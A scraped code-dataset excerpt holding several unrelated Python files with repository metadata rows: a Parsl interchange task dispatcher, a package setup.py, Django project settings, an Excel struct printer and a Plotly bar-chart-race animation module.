self._ready_manager_queue[manager]['last_heartbeat'] = time.time()
if tasks_requested == HEARTBEAT_CODE:
logger.debug("[MAIN] Manager {} sent heartbeat".format(manager))
self.task_outgoing.send_multipart([manager, b'', PKL_HEARTBEAT_CODE])
else:
logger.debug("[MAIN] Manager {} requested {} tasks".format(manager, tasks_requested))
self._ready_manager_queue[manager]['free_capacity'] = tasks_requested
interesting_managers.add(manager)
logger.debug("[MAIN] leaving task_outgoing section")
# If we had received any requests, check if there are tasks that could be passed
logger.debug("Managers count (interesting/total): {interesting}/{total}".format(
total=len(self._ready_manager_queue),
interesting=len(interesting_managers)))
if interesting_managers and not self.pending_task_queue.empty():
shuffled_managers = list(interesting_managers)
random.shuffle(shuffled_managers)
while shuffled_managers and not self.pending_task_queue.empty(): # cf. the if statement above...
manager = shuffled_managers.pop()
tasks_inflight = len(self._ready_manager_queue[manager]['tasks'])
real_capacity = min(self._ready_manager_queue[manager]['free_capacity'],
self._ready_manager_queue[manager]['max_capacity'] - tasks_inflight)
if (real_capacity and self._ready_manager_queue[manager]['active']):
tasks = self.get_tasks(real_capacity)
if tasks:
self.task_outgoing.send_multipart([manager, b'', pickle.dumps(tasks)])
task_count = len(tasks)
count += task_count
tids = [t['task_id'] for t in tasks]
self._ready_manager_queue[manager]['free_capacity'] -= task_count
self._ready_manager_queue[manager]['tasks'].extend(tids)
self._ready_manager_queue[manager]['idle_since'] = None
logger.debug("[MAIN] Sent tasks: {} to manager {}".format(tids, manager))
if self._ready_manager_queue[manager]['free_capacity'] > 0:
logger.debug("[MAIN] Manager {} has free_capacity {}".format(manager, self._ready_manager_queue[manager]['free_capacity']))
# ... so keep it in the interesting_managers list
else:
logger.debug("[MAIN] Manager {} is now saturated".format(manager))
interesting_managers.remove(manager)
else:
interesting_managers.remove(manager)
# logger.debug("Nothing to send to manager {}".format(manager))
logger.debug("[MAIN] leaving _ready_manager_queue section, with {} managers still interesting".format(len(interesting_managers)))
else:
logger.debug("[MAIN] either no interesting managers or no tasks, so skipping manager pass")
# Receive any results and forward to client
if self.results_incoming in self.socks and self.socks[self.results_incoming] == zmq.POLLIN:
logger.debug("[MAIN] entering results_incoming section")
manager, *b_messages = self.results_incoming.recv_multipart()
if manager not in self._ready_manager_queue:
logger.warning("[MAIN] Received a result from a un-registered manager: {}".format(manager))
else:
logger.debug("[MAIN] Got {} result items in batch".format(len(b_messages)))
for b_message in b_messages:
r = pickle.loads(b_message)
try:
self._ready_manager_queue[manager]['tasks'].remove(r['task_id'])
except Exception:
# If we reach here, there's something very wrong.
logger.exception("Ignoring exception removing task_id {} for manager {} with task list {}".format(
r['task_id'],
manager,
self._ready_manager_queue[manager]['tasks']))
self.results_outgoing.send_multipart(b_messages)
logger.debug("[MAIN] Current tasks: {}".format(self._ready_manager_queue[manager]['tasks']))
if len(self._ready_manager_queue[manager]['tasks']) == 0:
self._ready_manager_queue[manager]['idle_since'] = time.time()
logger.debug("[MAIN] leaving results_incoming section")
bad_managers = [manager for manager in self._ready_manager_queue if
time.time() - self._ready_manager_queue[manager]['last_heartbeat'] > self.heartbeat_threshold]
for manager in bad_managers:
logger.debug("[MAIN] Last: {} Current: {}".format(self._ready_manager_queue[manager]['last_heartbeat'], time.time()))
logger.warning("[MAIN] Too many heartbeats missed for manager {}".format(manager))
if self._ready_manager_queue[manager]['active']:
self._ready_manager_queue[manager]['active'] = False
self._send_monitoring_info(hub_channel, manager)
for tid in self._ready_manager_queue[manager]['tasks']:
try:
raise ManagerLost(manager, self._ready_manager_queue[manager]['hostname'])
except Exception:
result_package = {'task_id': tid, 'exception': serialize_object(RemoteExceptionWrapper(*sys.exc_info()))}
pkl_package = pickle.dumps(result_package)
self.results_outgoing.send(pkl_package)
logger.warning("[MAIN] Sent failure reports, unregistering manager")
self._ready_manager_queue.pop(manager, 'None')
if manager in interesting_managers:
interesting_managers.remove(manager)
delta = time.time() - start
logger.info("Processed {} tasks in {} seconds".format(count, delta))
logger.warning("Exiting")
def start_file_logger(filename, name='interchange', level=logging.DEBUG, format_string=None):
"""Add a stream log handler.
Parameters
---------
filename: string
Name of the file to write logs to. Required.
name: string
Logger name. Default="parsl.executors.interchange"
level: logging.LEVEL
Set the logging level. Default=logging.DEBUG
    format_string: string
        Format string to use.
Returns
-------
None.
"""
if format_string is None:
format_string = "%(asctime)s.%(msecs)03d %(name)s:%(lineno)d [%(levelname)s] %(message)s"
global logger
logger = logging.getLogger(name)
logger.setLevel(level)
handler = logging.FileHandler(filename)
handler.setLevel(level)
formatter = logging.Formatter(format_string, datefmt='%Y-%m-%d %H:%M:%S')
handler.setFormatter(formatter)
logger.addHandler(handler)
@wrap_with_logs(target="interchange")
def starter(comm_q, *args, **kwargs):
"""Start the interchange process
The executor is expected to call this function. The args, kwargs match that of the Interchange.__init__
"""
# logger = multiprocessing.get_logger()
ic = Interchange(*args, **kwargs)
comm_q.put((ic.worker_task_port,
ic.worker_result_port))
ic.start()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--client_address",
help="Client address")
parser.add_argument("-l", "--logdir", default="parsl_worker_logs",
help="Parsl worker log directory")
parser.add_argument("-t", "--task_url",
help="REQUIRED: ZMQ url for receiving tasks")
parser.add_argument("-r", "--result_url",
help="REQUIRED: ZMQ url for posting results")
parser.add_argument("-p", "--poll_period",
help="REQUIRED: poll period used for main thread")
parser.add_argument("--worker_ports", default=None,
help="OPTIONAL, pair of workers ports to listen on, eg --worker_ports=50001,50005")
parser.add_argument("-d", "--debug", action='store_true',
help="Count of apps to launch")
args = parser.parse_args()
# Setup logging
global logger
format_string = "%(asctime)s %(name)s:%(lineno)d [%(levelname)s] %(message)s"
logger = logging.getLogger("interchange")
logger.setLevel(logging.DEBUG)
handler = logging.StreamHandler()
handler.setLevel('DEBUG' if args.debug is True else 'INFO')
formatter = logging.Formatter(format_string, datefmt='%Y-%m-%d %H:%M:%S')
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.debug("Starting Interchange")
optionals = {}
if args.worker_ports:
optionals['worker_ports'] = [int(i) for i in args.worker_ports.split(',')]
ic = Interchange(**optionals)
ic.start()
| 45.659021 | 155 | 0.563176 |
5ea3437a2eb33d0a2e1796c20919e26b2a0222ca | 1,741 | py | Python | setup.py | AadamAbrahams/covid_traffic_controller_demonstrator | d782e5f8ba33259b06e24bfbc79c23a958065c0d | [
"MIT"
] | null | null | null | setup.py | AadamAbrahams/covid_traffic_controller_demonstrator | d782e5f8ba33259b06e24bfbc79c23a958065c0d | [
"MIT"
] | 1 | 2020-10-30T12:25:58.000Z | 2020-10-30T12:25:58.000Z | setup.py | AadamAbrahams/covid_traffic_controller_demonstrator | d782e5f8ba33259b06e24bfbc79c23a958065c0d | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""The setup script."""
from setuptools import setup, find_packages
with open('README.rst') as readme_file:
readme = readme_file.read()
with open('HISTORY.rst') as history_file:
history = history_file.read()
requirements = ['Click>=7.0', ]
setup_requirements = [ ]
test_requirements = [ ]
setup(
author="Aadam Abrahams",
author_email='[email protected]',
python_requires='>=3.5',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
description="Python Boilerplate contains all the boilerplate you need to create a Python package.",
entry_points={
'console_scripts': [
'covid_traffic_controller_demonstrator=covid_traffic_controller_demonstrator.cli:main',
],
},
install_requires=requirements,
license="MIT license",
long_description=readme + '\n\n' + history,
include_package_data=True,
keywords='covid_traffic_controller_demonstrator',
name='covid_traffic_controller_demonstrator',
packages=find_packages(include=['covid_traffic_controller_demonstrator', 'covid_traffic_controller_demonstrator.*']),
setup_requires=setup_requirements,
test_suite='tests',
tests_require=test_requirements,
url='https://github.com/AadamAbrahams/covid_traffic_controller_demonstrator',
version='0.1.0',
zip_safe=False,
)
| 32.240741 | 121 | 0.682941 |
5a4e556665f9fd12d67fff6f74fb86c6d27c68b8 | 4,092 | py | Python | core/settings/base.py | BuildForSDG/asylum-be | e44031ca97964425bfa11a1d9071e7584685c327 | [
"MIT"
] | null | null | null | core/settings/base.py | BuildForSDG/asylum-be | e44031ca97964425bfa11a1d9071e7584685c327 | [
"MIT"
] | 23 | 2020-05-07T07:57:44.000Z | 2022-03-12T00:36:41.000Z | core/settings/base.py | BuildForSDG/asylum-be | e44031ca97964425bfa11a1d9071e7584685c327 | [
"MIT"
] | 3 | 2020-05-02T07:56:55.000Z | 2020-05-19T14:42:54.000Z | """Django project core settings. Generated by 'django-admin startproject' using Django 2.2.10."""
import os
from decouple import config
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = config('SECRET_KEY')
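# python-decouple resolves config('SECRET_KEY') from the environment or a .env file
# at the repository root; an illustrative placeholder entry would be:
#   SECRET_KEY=replace-with-a-long-random-string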
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
'allauth',
'allauth.account',
'rest_framework',
'rest_framework.authtoken',
'rest_auth',
'rest_auth.registration',
'django_filters',
'rest_framework_swagger',
'accounts',
'api',
'disorders',
'notifications',
'ratings',
]
MIDDLEWARE = [
'corsheaders.middleware.CorsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'core.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'core.wsgi.application'
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Authentication settings
# Custom user model and related all-auth settings
AUTH_USER_MODEL = 'accounts.User'
ACCOUNT_AUTHENTICATION_METHOD = 'email'
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_SIGNUP_PASSWORD_ENTER_TWICE = False
OLD_PASSWORD_FIELD_ENABLED = True
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend',
)
REST_AUTH_SERIALIZERS = {
'USER_DETAILS_SERIALIZER': 'accounts.serializers.UserSerializer'
}
# Default DRF settings
# https://www.django-rest-framework.org/api-guide/permissions/
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': [
'rest_framework.authentication.TokenAuthentication',
],
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.IsAuthenticated'
],
'DEFAULT_FILTER_BACKENDS': [
'django_filters.rest_framework.DjangoFilterBackend',
],
'DEFAULT_SCHEMA_CLASS': 'rest_framework.schemas.coreapi.AutoSchema'
}
# Rest swagger settings for API docs
# https://django-rest-swagger.readthedocs.io/en/latest/settings/
SWAGGER_SETTINGS = {
'SECURITY_DEFINITIONS': {
'api_key': {
'type': 'apiKey',
'description': 'Token authentication for Swagger UI Client',
'in': 'header',
'name': 'Authorization'
}
},
'USE_SESSION_AUTH': False,
}
# Site admins and managers
# https://docs.djangoproject.com/en/2.2/ref/settings/
ADMINS = (
('Mohammed Mwijaa', '[email protected]'),
)
MANAGERS = (
('Mohammed Mwijaa', '[email protected]'),
)
# Django sites settings
# https://docs.djangoproject.com/en/2.2/ref/contrib/sites/
SITE_ID = 1
# Django CORS headers settings
# https://github.com/adamchainz/django-cors-headers
CORS_ORIGIN_ALLOW_ALL = True
| 25.259259 | 97 | 0.700391 |
3c787fc51233f70eb034eea4afa2e180748c9200 | 4,510 | py | Python | ayed/printer.py | Bocanada/AyED-Tool | 6bc359734fab3601dd668c361e67c4b14afcb2da | [
"MIT"
] | 1 | 2021-08-01T16:40:11.000Z | 2021-08-01T16:40:11.000Z | ayed/printer.py | Bocanada/AyED-Tool | 6bc359734fab3601dd668c361e67c4b14afcb2da | [
"MIT"
] | 5 | 2021-06-20T18:53:06.000Z | 2021-06-26T23:44:05.000Z | ayed/printer.py | Bocanada/AyED-Tool | 6bc359734fab3601dd668c361e67c4b14afcb2da | [
"MIT"
] | null | null | null | from __future__ import annotations
from abc import ABC, abstractmethod
from collections import defaultdict
from pathlib import Path
from typing import Iterable
from attr import dataclass, field
from ayed.classes import Struct
from ayed.excel import Excel
from ayed.types import File, Files, Structs
from ayed.utils import add_includes, console, sanitize_name
class Printer(ABC):
@abstractmethod
def to_str(self):
return NotImplemented
@abstractmethod
def to_file(self):
return NotImplemented
@dataclass
class StructPrinter(Printer):
"""Printer prints out an iterable of structs to either a str or a file."""
structs: Iterable[Struct]
def to_str(self) -> str:
"""Writes all the structs and functions to a str and returns it"""
s = add_includes(
libs=[
"filesystem",
"cstdio",
"iostream",
"cstring",
"string",
"biblioteca/funciones/tokens.hpp",
],
)
fbody = [
f"{str(token)}{token.init()}{token.to_str()}{token.from_str()}{token.to_debug()}"
for token in self.structs
]
return s + "\n".join(fbody)
def to_file(self, path: Path) -> None:
"""Writes all the structs and functions to output_files/path"""
fns = self.to_str()
out = Path("output_files")
out.mkdir(exist_ok=True)
path = out / path
with path.open("w", encoding="utf-8") as fh:
fh.write(fns)
console.log(
f"[b]Output file: [magenta]{path.absolute().as_uri()}[/magenta][/b]",
justify="center",
)
@classmethod
def from_tokens(cls, tokens: Structs) -> "StructPrinter":
return cls(iter(tokens))
@dataclass(slots=True)
class ExcelPrinter(Printer):
file: Excel
output_folder: Path = Path("output_files")
data: File | Files = field(init=False)
def _write_one(
self, *, file: File = None, sheet_name: str | None = None
) -> dict[str, list[list[bytes]]]:
if not file:
file = self.data # type: ignore
sheet_name = sanitize_name(sheet_name or self.file.sheet) # type: ignore
packed_structs = defaultdict(list)
for fname, struct in file:
packed = struct.pack()
packed_structs[fname].append(packed)
        return packed_structs  # mapping of output filename -> packed bytes; written to disk later by _write()
def _write_many(self):
if not isinstance(self.data, list):
raise ValueError(
f"Expected {list} of {dict} but got {type(self.file)}."
" Try using struct_from_file instead."
)
return [
[
self._write_one(file=fh, sheet_name=sheet_name)
for (sheet_name, fh) in file.items()
]
for file in self.data
]
def _write(self, bytes: dict[str, list[list[bytes]]]):
for fname, data in bytes.items():
with (self.output_folder / fname).open("wb") as fh:
for raw_bytes in data[0]:
fh.write(raw_bytes)
def to_file(self):
if not self.output_folder.exists():
self.output_folder.mkdir(exist_ok=True)
if isinstance(self.data, File):
to_write = self._write_one()
self._write(to_write)
return True
to_write = self._write_many()
for bytes_list in to_write:
for packed_structs in bytes_list:
self._write(packed_structs)
return True
def to_table(self):
if isinstance(self.data, File):
for fname, struct in self.data:
struct.unpack(self.output_folder / fname)
return
for sheet in self.data:
for _, file in sheet.items():
for fname, struct in file:
struct.unpack(self.output_folder / fname)
def to_str(self):
if isinstance(self.data, File):
to_write = self._write_one()
return "".join(f"{fname} -->\n {data}" for fname, data in to_write.items())
raise NotImplementedError
def __enter__(self) -> "ExcelPrinter":
self.data = self.file.read()
return self
def __exit__(self, *args):
del self.data
return False
if __name__ == "__main__":
e = Excel("AlgoritmosFiles.xlsx")
with ExcelPrinter(e) as p:
p.to_file()
| 30.472973 | 93 | 0.578936 |
6e93388cd754866c8ce07ad0a60f42ed69f8a528 | 32,779 | py | Python | bar_chart_race/_bar_chart_race_plotly.py | fakegit/bar_chart_race | 0d2d038c4dac382419a36e33d54a7cc843a84724 | [
"MIT"
] | null | null | null | bar_chart_race/_bar_chart_race_plotly.py | fakegit/bar_chart_race | 0d2d038c4dac382419a36e33d54a7cc843a84724 | [
"MIT"
] | null | null | null | bar_chart_race/_bar_chart_race_plotly.py | fakegit/bar_chart_race | 0d2d038c4dac382419a36e33d54a7cc843a84724 | [
"MIT"
] | null | null | null | import warnings
import numpy as np
import pandas as pd
import plotly.graph_objects as go
import plotly
from ._utils import prepare_wide_data
class _BarChartRace:
def __init__(self, df, filename, orientation, sort, n_bars, fixed_order, fixed_max,
steps_per_period, period_length, end_period_pause, interpolate_period,
period_label, period_template, period_summary_func, perpendicular_bar_func,
colors, title, bar_size, bar_textposition, bar_texttemplate, bar_label_font,
tick_label_font, hovertemplate, slider, scale, bar_kwargs, layout_kwargs,
write_html_kwargs, filter_column_colors):
self.filename = filename
self.extension = self.get_extension()
self.orientation = orientation
self.sort = sort
self.n_bars = n_bars or df.shape[1]
self.fixed_order = fixed_order
self.fixed_max = fixed_max
self.steps_per_period = steps_per_period
self.period_length = period_length
self.end_period_pause = end_period_pause
self.interpolate_period = interpolate_period
self.period_label = self.get_period_label(period_label)
self.period_template = period_template
self.period_summary_func = period_summary_func
self.perpendicular_bar_func = perpendicular_bar_func
self.title = self.get_title(title)
self.bar_size = bar_size
self.bar_textposition = bar_textposition
self.bar_texttemplate = self.get_bar_texttemplate(bar_texttemplate)
self.bar_label_font = self.get_font(bar_label_font)
self.tick_label_font = self.get_font(tick_label_font)
self.hovertemplate = self.get_hovertemplate(hovertemplate)
self.slider = slider
self.scale = scale
self.duration = self.period_length / steps_per_period
self.write_html_kwargs = write_html_kwargs or {}
self.filter_column_colors = filter_column_colors
self.validate_params()
self.bar_kwargs = self.get_bar_kwargs(bar_kwargs)
self.layout_kwargs = self.get_layout_kwargs(layout_kwargs)
self.df_values, self.df_ranks = self.prepare_data(df)
self.col_filt = self.get_col_filt()
self.bar_colors = self.get_bar_colors(colors)
self.set_fixed_max_limits()
self.str_index = self.df_values.index.astype('str')
def get_extension(self):
if self.filename:
return self.filename.split('.')[-1]
def get_bar_texttemplate(self, bar_texttemplate):
if bar_texttemplate is None:
bar_texttemplate = '%{x:,.0f}' if self.orientation == 'h' else '%{y:,.0f}'
return bar_texttemplate
def validate_params(self):
if isinstance(self.filename, str):
if '.' not in self.filename:
raise ValueError('`filename` must have an extension')
elif self.filename is not None:
raise TypeError('`filename` must be None or a string')
if self.sort not in ('asc', 'desc'):
raise ValueError('`sort` must be "asc" or "desc"')
if self.orientation not in ('h', 'v'):
raise ValueError('`orientation` must be "h" or "v"')
def get_bar_kwargs(self, bar_kwargs):
if bar_kwargs is None:
return {'opacity': .8}
elif isinstance(bar_kwargs, dict):
if 'opacity' not in bar_kwargs:
bar_kwargs['opacity'] = .8
return bar_kwargs
raise TypeError('`bar_kwargs` must be None or a dictionary mapping `go.Bar` parameters '
'to values.')
def get_layout_kwargs(self, layout_kwargs):
if layout_kwargs is None:
return {'showlegend': False}
elif isinstance(layout_kwargs, dict):
if {'xaxis', 'yaxis', 'annotations'} & layout_kwargs.keys():
raise ValueError('`layout_kwargs` cannot contain "xaxis", "yaxis", or '
' "annotations".')
if 'showlegend' not in layout_kwargs:
layout_kwargs['showlegend'] = False
return layout_kwargs
elif isinstance(layout_kwargs, plotly.graph_objs._layout.Layout):
return self.get_layout_kwargs(layout_kwargs.to_plotly_json())
raise TypeError('`layout_kwargs` must be None, a dictionary mapping '
'`go.Layout` parameters to values or an instance of `go.Layout`.')
def get_period_label(self, period_label):
if period_label is False:
return False
default_period_label = {'xref': 'paper', 'yref': 'paper', 'font': {'size': 20},
'xanchor': 'right', 'showarrow': False}
if self.orientation == 'h':
default_period_label['x'] = .95
default_period_label['y'] = .15 if self.sort == 'desc' else .85
else:
default_period_label['x'] = .95 if self.sort == 'desc' else .05
default_period_label['y'] = .85
default_period_label['xanchor'] = 'left' if self.sort == 'asc' else 'right'
if period_label is True:
return default_period_label
elif isinstance(period_label, dict):
period_label = {**default_period_label, **period_label}
else:
raise TypeError('`period_label` must be a boolean or dictionary')
return period_label
def get_title(self, title):
if title is None:
return
if isinstance(title, str):
return {'text': title, 'y': 1, 'x': .5, 'xref': 'paper', 'yref': 'paper',
'pad': {'b': 10},
'xanchor': 'center', 'yanchor': 'bottom'}
elif isinstance(title, (dict, plotly.graph_objects.layout.Title)):
return title
raise TypeError('`title` must be a string, dictionary, or '
'`plotly.graph_objects.layout.Title` instance')
def get_font(self, font):
if font is None:
font = {'size': 12}
elif isinstance(font, (int, float)):
font = {'size': font}
elif not isinstance(font, dict):
raise TypeError('`font` must be a number or dictionary of font properties')
return font
def get_hovertemplate(self, hovertemplate):
if hovertemplate is None:
if self.orientation == 'h':
return '%{y} - %{x:,.0f}<extra></extra>'
return '%{x} - %{y:,.0f}<extra></extra>'
return hovertemplate
def prepare_data(self, df):
if self.fixed_order is True:
last_values = df.iloc[-1].sort_values(ascending=False)
cols = last_values.iloc[:self.n_bars].index
df = df[cols]
elif isinstance(self.fixed_order, list):
cols = self.fixed_order
df = df[cols]
self.n_bars = min(len(cols), self.n_bars)
compute_ranks = self.fixed_order is False
dfs = prepare_wide_data(df, orientation=self.orientation, sort=self.sort,
n_bars=self.n_bars, interpolate_period=self.interpolate_period,
steps_per_period=self.steps_per_period, compute_ranks=compute_ranks)
if isinstance(dfs, tuple):
df_values, df_ranks = dfs
else:
df_values = dfs
if self.fixed_order:
n = df_values.shape[1] + 1
m = df_values.shape[0]
rank_row = np.arange(1, n)
if (self.sort == 'desc' and self.orientation == 'h') or \
(self.sort == 'asc' and self.orientation == 'v'):
rank_row = rank_row[::-1]
ranks_arr = np.repeat(rank_row.reshape(1, -1), m, axis=0)
df_ranks = pd.DataFrame(data=ranks_arr, columns=cols)
return df_values, df_ranks
def get_col_filt(self):
col_filt = pd.Series([True] * self.df_values.shape[1])
if self.n_bars < self.df_ranks.shape[1]:
orient_sort = self.orientation, self.sort
if orient_sort in [('h', 'asc'), ('v', 'desc')]:
# 1 is high
col_filt = (self.df_ranks < self.n_bars + .99).any()
else:
# 1 is low
col_filt = (self.df_ranks > 0).any()
if self.filter_column_colors and not col_filt.all():
self.df_values = self.df_values.loc[:, col_filt]
self.df_ranks = self.df_ranks.loc[:, col_filt]
return col_filt
def get_bar_colors(self, colors):
if colors is None:
colors = 'dark12'
if self.df_values.shape[1] > 10:
colors = 'dark24'
if isinstance(colors, str):
from ._colormaps import colormaps
try:
bar_colors = colormaps[colors.lower()]
except KeyError:
raise KeyError(f'Colormap {colors} does not exist. Here are the '
f'possible colormaps: {colormaps.keys()}')
elif isinstance(colors, list):
bar_colors = colors
elif isinstance(colors, tuple):
bar_colors = list(colors)
elif hasattr(colors, 'tolist'):
bar_colors = colors.tolist()
else:
raise TypeError('`colors` must be a string name of a colormap or '
'sequence of colors.')
# bar_colors is now a list
n = len(bar_colors)
orig_bar_colors = bar_colors
if self.df_values.shape[1] > n:
bar_colors = bar_colors * (self.df_values.shape[1] // n + 1)
bar_colors = np.array(bar_colors[:self.df_values.shape[1]])
# plotly uses 0, 255 rgb colors, matplotlib is 0 to 1
if bar_colors.dtype.kind == 'f' and bar_colors.shape[1] == 3 and (bar_colors <= 1).all():
bar_colors = pd.DataFrame(bar_colors).astype('str')
bar_colors = bar_colors.apply(lambda x: ','.join(x), axis = 1)
bar_colors = ('rgb(' + bar_colors + ')').values
if not self.filter_column_colors:
if not self.col_filt.all():
col_idx = np.where(self.col_filt)[0] % n
col_idx_ct = np.bincount(col_idx, minlength=n)
num_cols = max(self.col_filt.sum(), n)
exp_ct = np.bincount(np.arange(num_cols) % n, minlength=n)
if (col_idx_ct > exp_ct).any():
warnings.warn("Some of your columns never make an appearance in the animation. "
"To reduce color repetition, set `filter_column_colors` to `True`")
return bar_colors
def set_fixed_max_limits(self):
label_limit = (.2, self.n_bars + .8)
value_limit = None
min_val = 1 if self.scale == 'log' else 0
if self.fixed_max:
value_limit = [min_val, self.df_values.max().max() * 1.1]
if self.orientation == 'h':
self.xlimit = value_limit
self.ylimit = label_limit
else:
self.xlimit = label_limit
self.ylimit = value_limit
def set_value_limit(self, bar_vals):
min_val = 1 if self.scale == 'log' else 0
if not self.fixed_max:
value_limit = [min_val, bar_vals.max() * 1.1]
if self.orientation == 'h':
self.xlimit = value_limit
else:
self.ylimit = value_limit
def get_frames(self):
frames = []
slider_steps = []
for i in range(len(self.df_values)):
bar_locs = self.df_ranks.iloc[i].values
top_filt = (bar_locs >= 0) & (bar_locs < self.n_bars + 1)
bar_vals = self.df_values.iloc[i].values
bar_vals[bar_locs == 0] = 0
bar_vals[bar_locs == self.n_bars + 1] = 0
# self.set_value_limit(bar_vals) # plotly bug? not updating range
cols = self.df_values.columns.values.copy()
cols[bar_locs == 0] = ' '
colors = self.bar_colors
bar_locs = bar_locs + np.random.rand(len(bar_locs)) / 10_000 # done to prevent stacking of bars
x, y = (bar_vals, bar_locs) if self.orientation == 'h' else (bar_locs, bar_vals)
label_axis = dict(tickmode='array', tickvals=bar_locs, ticktext=cols,
tickfont=self.tick_label_font)
label_axis['range'] = self.ylimit if self.orientation == 'h' else self.xlimit
if self.orientation == 'v':
label_axis['tickangle'] = -90
value_axis = dict(showgrid=True, type=self.scale)#, tickformat=',.0f')
value_axis['range'] = self.xlimit if self.orientation == 'h' else self.ylimit
bar = go.Bar(x=x, y=y, width=self.bar_size, textposition=self.bar_textposition,
texttemplate=self.bar_texttemplate, orientation=self.orientation,
marker_color=colors, insidetextfont=self.bar_label_font,
cliponaxis=False, outsidetextfont=self.bar_label_font,
hovertemplate=self.hovertemplate, **self.bar_kwargs)
data = [bar]
xaxis, yaxis = (value_axis, label_axis) if self.orientation == 'h' \
else (label_axis, value_axis)
annotations = self.get_annotations(i)
if self.slider and i % self.steps_per_period == 0:
slider_steps.append(
{"args": [[i],
{"frame": {"duration": self.duration, "redraw": False},
"mode": "immediate",
"fromcurrent": True,
"transition": {"duration": self.duration}
}],
"label": self.get_period_label_text(i),
"method": "animate"})
layout = go.Layout(xaxis=xaxis, yaxis=yaxis, annotations=annotations,
margin={'l': 150}, **self.layout_kwargs)
if self.perpendicular_bar_func:
pbar = self.get_perpendicular_bar(bar_vals, i, layout)
layout.update(shapes=[pbar], overwrite=True)
frames.append(go.Frame(data=data, layout=layout, name=i))
return frames, slider_steps
def get_period_label_text(self, i):
if self.period_template:
idx_val = self.df_values.index[i]
if self.df_values.index.dtype.kind == 'M':
s = idx_val.strftime(self.period_template)
else:
s = self.period_template.format(x=idx_val)
else:
s = self.str_index[i]
return s
def get_annotations(self, i):
annotations = []
if self.period_label:
self.period_label['text'] = self.get_period_label_text(i)
annotations.append(self.period_label)
if self.period_summary_func:
values = self.df_values.iloc[i]
ranks = self.df_ranks.iloc[i]
text_dict = self.period_summary_func(values, ranks)
if 'x' not in text_dict or 'y' not in text_dict or 'text' not in text_dict:
name = self.period_summary_func.__name__
raise ValueError(f'The dictionary returned from `{name}` must contain '
'"x", "y", and "s"')
text, x, y = text_dict['text'], text_dict['x'], text_dict['y']
annotations.append(dict(text=text, x=x, y=y, font=dict(size=14),
xref="paper", yref="paper", showarrow=False))
return annotations
def get_perpendicular_bar(self, bar_vals, i, layout):
if isinstance(self.perpendicular_bar_func, str):
val = pd.Series(bar_vals).agg(self.perpendicular_bar_func)
else:
values = self.df_values.iloc[i]
ranks = self.df_ranks.iloc[i]
val = self.perpendicular_bar_func(values, ranks)
xref, yref = ("x", "paper") if self.orientation == 'h' else ("paper", "y")
value_limit = self.xlimit if self.orientation == 'h' else self.ylimit
if self.fixed_max:
delta = (value_limit[1] - value_limit[0]) * .02
else:
delta = (1.05 * bar_vals.max() - bar_vals.min()) * .02
x0, x1 = (val - delta, val + delta) if self.orientation == 'h' else (0, 1)
y0, y1 = (val - delta, val + delta) if self.orientation == 'v' else (0, 1)
return dict(type="rect", xref=xref, yref=yref, x0=x0, y0=y0, x1=x1, y1=y1,
fillcolor="#444444",layer="below", opacity=.5, line_width=0)
def make_animation(self):
frames, slider_steps = self.get_frames()
data = frames[0].data
layout = frames[0].layout
layout.title = self.title
layout.updatemenus = [dict(
type="buttons",
direction = "left",
x=1,
y=1.02,
xanchor='right',
yanchor='bottom',
buttons=[dict(label="Play",
method="animate",
# redraw must be true for bar plots
args=[None, {"frame": {"duration": self.duration, "redraw": True},
"fromcurrent": True
}]),
dict(label="Pause",
method="animate",
args=[[None], {"frame": {"duration": 0, "redraw": False},
"mode": "immediate",
"transition": {"duration": 0}}]),
]
)]
sliders_dict = {
"active": 0,
"yanchor": "top",
"xanchor": "left",
"currentvalue": {
# "font": {"size": 20},
# "prefix": '', # allow user to set
"visible": False, # just repeats period label
# "xanchor": "right"
},
"transition": {"duration": self.duration, "easing": "cubic-in-out"},
"pad": {"b": 10, "t": 50},
"len": 0.88,
"x": 0.05,
"y": 0,
"steps": slider_steps
}
if self.slider:
layout.sliders = [sliders_dict]
fig = go.Figure(data=data, layout=layout, frames=frames[1:])
if self.filename:
fig.write_html(self.filename, **self.write_html_kwargs)
else:
return fig
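# Hedged usage sketch for the public function below (illustrative only; `df` is assumed
# to be a wide DataFrame with one row per period and one column per category, and the
# function is assumed to be re-exported at package level):
#
#   import bar_chart_race as bcr
#   bcr.bar_chart_race_plotly(df, filename='race.html', n_bars=10,
#                             period_length=500, title='My Bar Chart Race')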
